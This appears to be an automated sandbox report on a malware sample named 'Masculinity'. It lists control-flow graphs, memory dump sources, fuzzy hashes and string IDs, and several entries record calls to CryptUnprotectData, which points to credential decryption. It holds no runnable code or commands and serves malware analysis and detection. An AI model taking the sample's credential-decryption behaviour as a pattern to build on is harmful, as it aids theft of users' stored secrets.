                                              control_flow_graph 1216 155362-155364 1217 1553c4-155484 call 1541a0 call 153cc0 1216->1217 1218 155366-1553a0 1216->1218 1230 155486 1217->1230 1231 15548b-1554a9 1217->1231 1219 1553a7-1553c2 1218->1219 1220 1553a2 1218->1220 1219->1217 1220->1219 1230->1231 1261 1554ac call 155649 1231->1261 1262 1554ac call 155658 1231->1262 1232 1554b2-1554bd 1233 1554c4-1554c8 1232->1233 1234 1554bf 1232->1234 1235 1554cd-1554d4 1233->1235 1236 1554ca-1554cb 1233->1236 1234->1233 1238 1554d6 1235->1238 1239 1554db-1554e9 1235->1239 1237 1554ec-155530 1236->1237 1243 155596-1555ad 1237->1243 1238->1239 1239->1237 1245 155532-155548 1243->1245 1246 1555af-1555d4 1243->1246 1249 155572 1245->1249 1250 15554a-155556 1245->1250 1252 1555d6-1555eb 1246->1252 1253 1555ec 1246->1253 1256 155578-155595 1249->1256 1254 155560-155566 1250->1254 1255 155558-15555e 1250->1255 1252->1253 1257 155570 1254->1257 1255->1257 1256->1243 1257->1256 1261->1232 1262->1232
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0o@p$Lj@p$Lj@p$PHcq$PHcq
                                              • API String ID: 0-4041061496
                                              • Opcode ID: 14d0a9aaa58f2aace06eb118d662e6899547c7fbe8e7e7208131afea01a0df12
                                              • Instruction ID: 1bb36ab6ea873bc38d736d844a5cf4d1bb557e932d59fdbaf2eae1175e7aed3d
                                              • Opcode Fuzzy Hash: 14d0a9aaa58f2aace06eb118d662e6899547c7fbe8e7e7208131afea01a0df12
                                              • Instruction Fuzzy Hash: 5491E874E00618CFDB14DFA9C894A9DBBF2BF89301F15C069E819AB365EB349985CF50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1263 15c468-15c471 1264 15c473-15c488 1263->1264 1265 15c48c-15c498 1263->1265 1264->1265 1266 15c49f-15c57c call 1541a0 call 153cc0 1265->1266 1267 15c49a 1265->1267 1277 15c583-15c5a4 call 155658 1266->1277 1278 15c57e 1266->1278 1267->1266 1280 15c5a9-15c5b4 1277->1280 1278->1277 1281 15c5b6 1280->1281 1282 15c5bb-15c5bf 1280->1282 1281->1282 1283 15c5c4-15c5cb 1282->1283 1284 15c5c1-15c5c2 1282->1284 1286 15c5d2-15c5e0 1283->1286 1287 15c5cd 1283->1287 1285 15c5e3-15c627 1284->1285 1291 15c68d-15c6a4 1285->1291 1286->1285 1287->1286 1293 15c6a6-15c6cb 1291->1293 1294 15c629-15c63f 1291->1294 1301 15c6e3 1293->1301 1302 15c6cd-15c6e2 1293->1302 1298 15c641-15c64d 1294->1298 1299 15c669 1294->1299 1303 15c657-15c65d 1298->1303 1304 15c64f-15c655 1298->1304 1300 15c66f-15c68c 1299->1300 1300->1291 1302->1301 1305 15c667 1303->1305 1304->1305 1305->1300
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0o@p$Lj@p$Lj@p$PHcq$PHcq
                                              • API String ID: 0-4041061496
                                              • Opcode ID: 2e38166b5157e8eac8d2fa9e18825d5f4bb5f28fa0bb91dc6fe5d305dd52eb23
                                              • Instruction ID: eaad1db2c776765c4394dad769510c3ad2b5aa48dbff4425e124b8235a92cdfa
                                              • Opcode Fuzzy Hash: 2e38166b5157e8eac8d2fa9e18825d5f4bb5f28fa0bb91dc6fe5d305dd52eb23
                                              • Instruction Fuzzy Hash: 7F81C674E00218DFDB14DFAAC884A9EBBF2BF89301F14D06AE819AB365DB345945CF51

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1309 15c19b-15c19d 1310 15c19f-15c1a1 1309->1310 1311 15c1b8 1309->1311 1312 15c1a3-15c1b2 1310->1312 1313 15c1bc-15c1c8 1310->1313 1311->1313 1312->1311 1314 15c1cf-15c2ac call 1541a0 call 153cc0 1313->1314 1315 15c1ca 1313->1315 1325 15c2b3-15c2d4 call 155658 1314->1325 1326 15c2ae 1314->1326 1315->1314 1328 15c2d9-15c2e4 1325->1328 1326->1325 1329 15c2e6 1328->1329 1330 15c2eb-15c2ef 1328->1330 1329->1330 1331 15c2f4-15c2fb 1330->1331 1332 15c2f1-15c2f2 1330->1332 1334 15c302-15c310 1331->1334 1335 15c2fd 1331->1335 1333 15c313-15c357 1332->1333 1339 15c3bd-15c3d4 1333->1339 1334->1333 1335->1334 1341 15c3d6-15c3fb 1339->1341 1342 15c359-15c36f 1339->1342 1348 15c413 1341->1348 1349 15c3fd-15c412 1341->1349 1346 15c371-15c37d 1342->1346 1347 15c399 1342->1347 1350 15c387-15c38d 1346->1350 1351 15c37f-15c385 1346->1351 1352 15c39f-15c3bc 1347->1352 1349->1348 1353 15c397 1350->1353 1351->1353 1352->1339 1353->1352
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0o@p$Lj@p$Lj@p$PHcq$PHcq
                                              • API String ID: 0-4041061496
                                              • Opcode ID: 2b3fb8c1e00cca313d60312b089874abcc70253e647e8150d2780916659fa95e
                                              • Instruction ID: fda6b1140082e806f003533d016a49cd69fe7655add374ec007fe8a43348e271
                                              • Opcode Fuzzy Hash: 2b3fb8c1e00cca313d60312b089874abcc70253e647e8150d2780916659fa95e
                                              • Instruction Fuzzy Hash: 7781C774E00618CFDB54DFAAC884A9DBBF2BF89301F14C06AE819AB365DB349945CF50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1357 15ca08-15ca38 1359 15ca3f-15ca9e call 1541a0 1357->1359 1360 15ca3a 1357->1360 1364 15caa3-15cb1c call 153cc0 1359->1364 1360->1359 1370 15cb23-15cb54 call 155658 1364->1370 1371 15cb1e 1364->1371 1374 15cb56 1370->1374 1375 15cb5b-15cb5f 1370->1375 1371->1370 1374->1375 1376 15cb64-15cb6b 1375->1376 1377 15cb61-15cb62 1375->1377 1379 15cb72-15cb80 1376->1379 1380 15cb6d 1376->1380 1378 15cb83-15cbc7 1377->1378 1384 15cc2d-15cc44 1378->1384 1379->1378 1380->1379 1386 15cc46-15cc6b 1384->1386 1387 15cbc9-15cbdf 1384->1387 1394 15cc83 1386->1394 1395 15cc6d-15cc82 1386->1395 1391 15cbe1-15cbed 1387->1391 1392 15cc09 1387->1392 1396 15cbf7-15cbfd 1391->1396 1397 15cbef-15cbf5 1391->1397 1393 15cc0f-15cc2c 1392->1393 1393->1384 1395->1394 1398 15cc07 1396->1398 1397->1398 1398->1393
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0o@p$Lj@p$Lj@p$PHcq$PHcq
                                              • API String ID: 0-4041061496
                                              • Opcode ID: 01eb18ff8464e1b84ee146717e896a689ef539bf823715efc0fa2e8d127c3dbd
                                              • Instruction ID: ad371f46947c11e72bb0180abd9b03c2d77106324b7463e50a3ec2dac7a63f9f
                                              • Opcode Fuzzy Hash: 01eb18ff8464e1b84ee146717e896a689ef539bf823715efc0fa2e8d127c3dbd
                                              • Instruction Fuzzy Hash: CE81C574E00618CFDB14DFAAC884A9EBBF2BF89301F14C069E819AB365DB349945CF50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1402 15d2cd-15d2f8 1403 15d2ff-15d3dc call 1541a0 call 153cc0 1402->1403 1404 15d2fa 1402->1404 1414 15d3e3-15d404 call 155658 1403->1414 1415 15d3de 1403->1415 1404->1403 1417 15d409-15d414 1414->1417 1415->1414 1418 15d416 1417->1418 1419 15d41b-15d41f 1417->1419 1418->1419 1420 15d424-15d42b 1419->1420 1421 15d421-15d422 1419->1421 1423 15d432-15d440 1420->1423 1424 15d42d 1420->1424 1422 15d443-15d487 1421->1422 1428 15d4ed-15d504 1422->1428 1423->1422 1424->1423 1430 15d506-15d52b 1428->1430 1431 15d489-15d49f 1428->1431 1438 15d543 1430->1438 1439 15d52d-15d542 1430->1439 1435 15d4a1-15d4ad 1431->1435 1436 15d4c9 1431->1436 1440 15d4b7-15d4bd 1435->1440 1441 15d4af-15d4b5 1435->1441 1437 15d4cf-15d4ec 1436->1437 1437->1428 1439->1438 1442 15d4c7 1440->1442 1441->1442 1442->1437
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0o@p$Lj@p$Lj@p$PHcq$PHcq
                                              • API String ID: 0-4041061496
                                              • Opcode ID: 839fe4ebce9779184f651e581ad71a835123c388e80fe0e7ce9b4b210a5ffed5
                                              • Instruction ID: bb11d4cf09a8f3da17e672c76f69216b009c15f50882fdc7fa5d4bb7c08a29b8
                                              • Opcode Fuzzy Hash: 839fe4ebce9779184f651e581ad71a835123c388e80fe0e7ce9b4b210a5ffed5
                                              • Instruction Fuzzy Hash: FE81B574E00218DFDB14DFAAD884A9DBBF2BF89301F14C069E819AB365DB34A945CF51

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1535 15d599-15d5c8 1536 15d5cf-15d6ac call 1541a0 call 153cc0 1535->1536 1537 15d5ca 1535->1537 1547 15d6b3-15d6d4 call 155658 1536->1547 1548 15d6ae 1536->1548 1537->1536 1550 15d6d9-15d6e4 1547->1550 1548->1547 1551 15d6e6 1550->1551 1552 15d6eb-15d6ef 1550->1552 1551->1552 1553 15d6f4-15d6fb 1552->1553 1554 15d6f1-15d6f2 1552->1554 1556 15d702-15d710 1553->1556 1557 15d6fd 1553->1557 1555 15d713-15d757 1554->1555 1561 15d7bd-15d7d4 1555->1561 1556->1555 1557->1556 1563 15d7d6-15d7fb 1561->1563 1564 15d759-15d76f 1561->1564 1570 15d813 1563->1570 1571 15d7fd-15d812 1563->1571 1568 15d771-15d77d 1564->1568 1569 15d799 1564->1569 1572 15d787-15d78d 1568->1572 1573 15d77f-15d785 1568->1573 1574 15d79f-15d7bc 1569->1574 1571->1570 1575 15d797 1572->1575 1573->1575 1574->1561 1575->1574
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0o@p$Lj@p$Lj@p$PHcq$PHcq
                                              • API String ID: 0-4041061496
                                              • Opcode ID: 2df77bce58beacf3505dbc7b235a95216ae7736753516575037b5ad5c5686fdd
                                              • Instruction ID: b79d6c72064a32f987fca6f1a64a75de494509f82e045c16f82506e094808ac8
                                              • Opcode Fuzzy Hash: 2df77bce58beacf3505dbc7b235a95216ae7736753516575037b5ad5c5686fdd
                                              • Instruction Fuzzy Hash: 1081C574E01218CFDB14DFAAD884A9DBBF2BF88305F14C069E819AB365DB349945CF50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1446 15c738-15c768 1447 15c76f-15c84c call 1541a0 call 153cc0 1446->1447 1448 15c76a 1446->1448 1458 15c853-15c874 call 155658 1447->1458 1459 15c84e 1447->1459 1448->1447 1461 15c879-15c884 1458->1461 1459->1458 1462 15c886 1461->1462 1463 15c88b-15c88f 1461->1463 1462->1463 1464 15c894-15c89b 1463->1464 1465 15c891-15c892 1463->1465 1467 15c8a2-15c8b0 1464->1467 1468 15c89d 1464->1468 1466 15c8b3-15c8f7 1465->1466 1472 15c95d-15c974 1466->1472 1467->1466 1468->1467 1474 15c976-15c99b 1472->1474 1475 15c8f9-15c90f 1472->1475 1481 15c9b3 1474->1481 1482 15c99d-15c9b2 1474->1482 1479 15c911-15c91d 1475->1479 1480 15c939 1475->1480 1483 15c927-15c92d 1479->1483 1484 15c91f-15c925 1479->1484 1485 15c93f-15c95c 1480->1485 1482->1481 1486 15c937 1483->1486 1484->1486 1485->1472 1486->1485
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0o@p$Lj@p$Lj@p$PHcq$PHcq
                                              • API String ID: 0-4041061496
                                              • Opcode ID: d74f64f97351524cced828797e77b40c15e339ce96a2f542f11ad6de7844c51d
                                              • Instruction ID: 0b5a726b5f61d4b6f66f2a04984499a792e125b512b664776420ebbfa743236b
                                              • Opcode Fuzzy Hash: d74f64f97351524cced828797e77b40c15e339ce96a2f542f11ad6de7844c51d
                                              • Instruction Fuzzy Hash: 5E81D674E00218DFDB14DFAAD984A9DBBF2BF88305F14C06AE819AB365DB349945CF50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1490 15cff8-15d028 1492 15d02f-15d10c call 1541a0 call 153cc0 1490->1492 1493 15d02a 1490->1493 1503 15d113-15d134 call 155658 1492->1503 1504 15d10e 1492->1504 1493->1492 1506 15d139-15d144 1503->1506 1504->1503 1507 15d146 1506->1507 1508 15d14b-15d14f 1506->1508 1507->1508 1509 15d154-15d15b 1508->1509 1510 15d151-15d152 1508->1510 1512 15d162-15d170 1509->1512 1513 15d15d 1509->1513 1511 15d173-15d1b7 1510->1511 1517 15d21d-15d234 1511->1517 1512->1511 1513->1512 1519 15d236-15d25b 1517->1519 1520 15d1b9-15d1cf 1517->1520 1526 15d273 1519->1526 1527 15d25d-15d272 1519->1527 1523 15d1d1-15d1dd 1520->1523 1524 15d1f9 1520->1524 1528 15d1e7-15d1ed 1523->1528 1529 15d1df-15d1e5 1523->1529 1530 15d1ff-15d21c 1524->1530 1527->1526 1531 15d1f7 1528->1531 1529->1531 1530->1517 1531->1530
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0o@p$Lj@p$Lj@p$PHcq$PHcq
                                              • API String ID: 0-4041061496
                                              • Opcode ID: 48cc918db7e3af194c9df512058dd3acfbe457e89eb33807ecacf8c2210c822d
                                              • Instruction ID: 437fd02379d6ab0b495b1c4670c624e45ad8f12691d53cd39ece5cbeae41a915
                                              • Opcode Fuzzy Hash: 48cc918db7e3af194c9df512058dd3acfbe457e89eb33807ecacf8c2210c822d
                                              • Instruction Fuzzy Hash: AA81E674E01658CFDB14DFAAD884A9DBBF2BF88301F24C069E819AB365DB349945CF10
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (ocq$4'cq$4'cq$4'cq
                                              • API String ID: 0-140906574
                                              • Opcode ID: 9fa802317b78f482603f2c39b0a8de50e0b6a861d54831a21f404cfa38e1cbd1
                                              • Instruction ID: d4bb636a38594dab199c161d72df880ba3c88e0f2e239d9a9687dc6f11ed1929
                                              • Opcode Fuzzy Hash: 9fa802317b78f482603f2c39b0a8de50e0b6a861d54831a21f404cfa38e1cbd1
                                              • Instruction Fuzzy Hash: 59A28270A40209CFCB15CF68C994AAEBBF2BF88301F558659E815DF261D734ED89CB52
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (ocq$(ocq$,gq$,gq
                                              • API String ID: 0-2401767512
                                              • Opcode ID: 64ea0330e69ebd233be054bf71463dcc04f98bb3eb262dca0210b4b25a567775
                                              • Instruction ID: 8d801f8c271a4b9ca97871a32b88b516c7d1de3cd9fdd7b118bc2a9f853d7b14
                                              • Opcode Fuzzy Hash: 64ea0330e69ebd233be054bf71463dcc04f98bb3eb262dca0210b4b25a567775
                                              • Instruction Fuzzy Hash: E3026130A04219DFCB15CF68E885AADBBF2BF49301F558069EC25AB2A1D730DD49CF51
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (ocq$Hgq
                                              • API String ID: 0-2239030825
                                              • Opcode ID: e6e1f426df02ef25a3ba50a513ef69eea25e290720d41a266e532dadf50c8b86
                                              • Instruction ID: 48d1bb3abbfa1433cdc382b33ce09640f55e3024391f1eacc32172d7e3c9776f
                                              • Opcode Fuzzy Hash: e6e1f426df02ef25a3ba50a513ef69eea25e290720d41a266e532dadf50c8b86
                                              • Instruction Fuzzy Hash: 1B127E70A00219CFDB14DF69C854AAEBBF6BF88301F508569E959DB3A1DB309D85CB90
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1957e2649d40e8d379d4c34b9d8517e22f308292be8703a1c1bcb3bca586d5e8
                                              • Instruction ID: f0368f6da3eaa7d9a5bcc7a43d511117ec73d699d88844b02121df0c9a18f9f7
                                              • Opcode Fuzzy Hash: 1957e2649d40e8d379d4c34b9d8517e22f308292be8703a1c1bcb3bca586d5e8
                                              • Instruction Fuzzy Hash: 3B222AB4E00218CFDB14DFA9C884B9EBBB6BF88300F5085A9D419AB355DB34AD85CF51
                                              APIs
                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 04A98F5D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275457914.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4a90000_Masculinity.jbxd
                                              Similarity
                                              • API ID: CryptDataUnprotect
                                              • String ID:
                                              • API String ID: 834300711-0
                                              • Opcode ID: 81e5b4231f9169d742aba90e0428cfb721545902fe33923dd750a6772560d887
                                              • Instruction ID: 73f6cbba464584181ef304cabb9e76f865b895f2fb6e4922bd1272e62ea714b5
                                              • Opcode Fuzzy Hash: 81e5b4231f9169d742aba90e0428cfb721545902fe33923dd750a6772560d887
                                              • Instruction Fuzzy Hash: 6C1156B2800349AFDB10DF99C904BEEBFF5EF48320F14841AE528A7210C379A954DFA5
                                              APIs
                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 04A98F5D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275457914.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4a90000_Masculinity.jbxd
                                              Similarity
                                              • API ID: CryptDataUnprotect
                                              • String ID:
                                              • API String ID: 834300711-0
                                              • Opcode ID: c15a824c257be2979554801b1ee2806874613aee43361684f41448507ec37d78
                                              • Instruction ID: 7a96da94420268f285dda7ce6cdeea442c5d9bc86cab17aba64e29ae79ee3ae0
                                              • Opcode Fuzzy Hash: c15a824c257be2979554801b1ee2806874613aee43361684f41448507ec37d78
                                              • Instruction Fuzzy Hash: 691167B6800249AFDB10DF99C844BDEBFF5EF49320F14845AE528A7210C339A554DFA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Hgq
                                              • API String ID: 0-2103768809
                                              • Opcode ID: febf8671e866e58ccfb730f181922772b8f6fcbe1a098e47f995b9427ea5c8b7
                                              • Instruction ID: f122c6adbff85de48ec69f7c7f1f75682417b5e0e41dc06d4e0b447c988e71a4
                                              • Opcode Fuzzy Hash: febf8671e866e58ccfb730f181922772b8f6fcbe1a098e47f995b9427ea5c8b7
                                              • Instruction Fuzzy Hash: 9881E374E002289FEB65DF69CC54BEDBBB2AF89300F5081A9D51DA72A0DB305E85CF41
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ce1fe614ea343876239ed003ba2e5b418edcee0e2f50ffd2cbebe0465784f58
                                              • Instruction ID: 975b7a24c27ffddb0f4b4b40290b66477ba85c79fccbd82b471d23001054ef50
                                              • Opcode Fuzzy Hash: 4ce1fe614ea343876239ed003ba2e5b418edcee0e2f50ffd2cbebe0465784f58
                                              • Instruction Fuzzy Hash: E4825C74E012289FDB64DF69CD94BDEBBB2BB89300F1081EA951DA7265DB305E81CF41
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 23f3905c6b449f6e4d961bd576948a0698cdd6c0ff55e160005e6132e2eb96b1
                                              • Instruction ID: 6f319a7422f69b255f90aecc964fe577fbf55b88c4f7a0f6fa1f1dc8c8aaa0c6
                                              • Opcode Fuzzy Hash: 23f3905c6b449f6e4d961bd576948a0698cdd6c0ff55e160005e6132e2eb96b1
                                              • Instruction Fuzzy Hash: A772B074E052298FDB64DF69C984BDDBBB2BB49300F5481E9D44AA7251EB34AEC1CF40
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 92e0fb847f2cb802d66f8f8fa7cb24aed2fc91966f3c576816e9d17a7435764b
                                              • Instruction ID: 839c36a93767a185176795d3081a4e1820e24308aa06e6940a5e4a71106e5d98
                                              • Opcode Fuzzy Hash: 92e0fb847f2cb802d66f8f8fa7cb24aed2fc91966f3c576816e9d17a7435764b
                                              • Instruction Fuzzy Hash: D0727C74E012289FDB64DF69CD94BDABBB2BF89300F1081E9A50DA7265DB315E81CF41
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a79f2aa7a078d953646c9cff696136ae87e516d0459ee645be02039ca70bc32c
                                              • Instruction ID: 2780da0e1fcea50a098d7f16d296830f1c3726dc837498a7b3605fd31aba6645
                                              • Opcode Fuzzy Hash: a79f2aa7a078d953646c9cff696136ae87e516d0459ee645be02039ca70bc32c
                                              • Instruction Fuzzy Hash: 14E1C1B4E01218CFEB25DFA9C944B9DBBB2BF88304F1080A9D819A7365DB355E85CF51
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275457914.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4a90000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c6ecffc24330f404ba4f03c6f62011bbb1e4f7b2dee1910e2a14140351c4f4ba
                                              • Instruction ID: 3e2435dc01bc4623b9ab7254381edd49d2544ba1991ed9c01d25c4296d4b0d41
                                              • Opcode Fuzzy Hash: c6ecffc24330f404ba4f03c6f62011bbb1e4f7b2dee1910e2a14140351c4f4ba
                                              • Instruction Fuzzy Hash: A5E1B074E01218CFEB24DFA9C944B9DBBF2BF89304F2081A9D809A7295DB355E85CF54
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a09dcc11e60fa7e6e549347f442cbfa6371c69b460ea35562b60d14ddf550516
                                              • Instruction ID: 72d1bc8a544b3d61e80143b57c37cda8508ecf0c7be6d7b2022a32d6b032d007
                                              • Opcode Fuzzy Hash: a09dcc11e60fa7e6e549347f442cbfa6371c69b460ea35562b60d14ddf550516
                                              • Instruction Fuzzy Hash: 77D1C574E01218CFDB64DFA5C994B9EBBB2BF89304F1081A9D819AB364DB356D81CF50
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ba077ecb8e2baac74e1c86075cb141eaa73abde6904ae52a8e01e6ffd9f0e209
                                              • Instruction ID: 6995cbe249a6b5d7ba74b9b41fb5708446fa273b00d5d01056dfea16bffd03f9
                                              • Opcode Fuzzy Hash: ba077ecb8e2baac74e1c86075cb141eaa73abde6904ae52a8e01e6ffd9f0e209
                                              • Instruction Fuzzy Hash: 1DD1A374E01218CFDB64DFA5C994B9EBBB2BF89300F1081A9D809AB365DB355E81CF51
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275457914.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4a90000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 13154b8e5a0d85634aa4433b3f34b9bdfbb73f2cddee8f78740d2b62685ac931
                                              • Instruction ID: a635f7702087f814167e15ade54c6666dea15cbaed5b28377271c92b23dabceb
                                              • Opcode Fuzzy Hash: 13154b8e5a0d85634aa4433b3f34b9bdfbb73f2cddee8f78740d2b62685ac931
                                              • Instruction Fuzzy Hash: D6D18178E012188FDB55DFA9C984B9EBBF2BF89300F1080A9D809AB365DB355D85CF51
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 349d2f9684c54bcfc8911fecbf88a4948693136e5ae17ad92b7cf98f94646853
                                              • Instruction ID: f62c4632a3c54ef43188eac82e7895f00f71646cf925045466740de1d88557dc
                                              • Opcode Fuzzy Hash: 349d2f9684c54bcfc8911fecbf88a4948693136e5ae17ad92b7cf98f94646853
                                              • Instruction Fuzzy Hash: 8FC18F75E00218CFDB14DFA9C954B9DBBB2BF89301F1081A9D809AB365DB355E85CF50
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4dfca20b0cab7397807809e23e76d30d76a2181f52686d8df3b1aa7d707f51c6
